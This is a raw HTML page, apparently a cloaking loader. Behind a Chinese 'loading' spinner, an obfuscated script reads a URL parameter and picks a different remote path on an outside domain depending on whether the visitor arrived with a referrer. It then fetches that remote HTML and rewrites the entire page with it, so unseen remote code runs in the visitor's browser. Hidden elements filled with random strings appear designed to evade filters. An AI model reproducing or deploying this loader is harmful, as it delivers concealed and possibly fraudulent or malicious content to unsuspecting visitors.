<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .MvjBJ9 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .MvjBJ9 .YPjkux81CHj {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .MvjBJ9 .content {
            line-height: 50px;
            text-align: center
        }

        .MvjBJ9 .img {
            width: 100%
        }

        .MvjBJ9 .h9RTZvdwYeh {
            text-align: center
        }

        .MvjBJ9 .h9RTZvdwYeh span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .MvjBJ9 .h9RTZvdwYeh span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .MvjBJ9 .h9RTZvdwYeh span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .MvjBJ9 .h9RTZvdwYeh span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .MvjBJ9 .h9RTZvdwYeh span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .MvjBJ9 .h9RTZvdwYeh span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .MvjBJ9 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function egF8j9LSjxzD0(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var WDTSkf = egF8j9LSjxzD0('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ WDTSkf +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ WDTSkf +".html?a=share";
		}
		
        HQYI96=url+"#"+new Date().getTime();
        HQYI96 && function() {
            $.get(HQYI96, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>jGPNBgXaZfnWpOqFvkX4AcaLUB8</div>
<img  src='' style='display:none'>
<li style='display:none' >pKOvEtMXGzgNRFPmBcED4xP3YnCgqm6rMAWGsMKu2RGPln4pF9RdAlao1SYAfrJ3u</li>
<img  src='' style='display:none'>
<li style='display:none' >pKOvEtMXGzgNRFPmBcED4xP3YnCgqm6rMAWGsMKu2RGPln4pF9RdAlao1SYAfrJ3u</li>
<b style='display:none' >NKNZHSQgWQAFhljIHVg</b>
<ul style='display:none' >D9iK7DIyNmh91kQuZbKFChZxxnWhGes5KSOXejtVjPV1RGdWjILfhPlBhUUSqVBGW8ho</ul><div class="MvjBJ9">
    <div class="YPjkux81CHj">
        <div class="h9RTZvdwYeh">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>YRfMaXqu03asBznBIYNKFANCEwrUZr1nEReM5sn8Kby9Vio1j5NV69HKQqlSB1AjUOmcbBvH9jv068gTJZ1uW6M3liY6S</p>
<span style='display:none'>Quue97tqe6SyDbFUVEm60ILuH8gBZSYiJBU0v1diJhXo4rHScFvH3tJPNIMZSjnPU6HPs0mKbqxd</span>
<div style='display:none'>hfqDK4k6XgGSZqYwuTqYHpsFsAkpeMVePuPHDF7coHUlLgrKruGOxF3gotLe5RARgEFADyoDbWOElOlRnURIL</div>
<b style='display:none' >bt2kbQyV6DnxazXV3WpZagfCSkR378JOJfbqgfKTPQ2Ywjhxkca0DU3zB</b></body>
</html>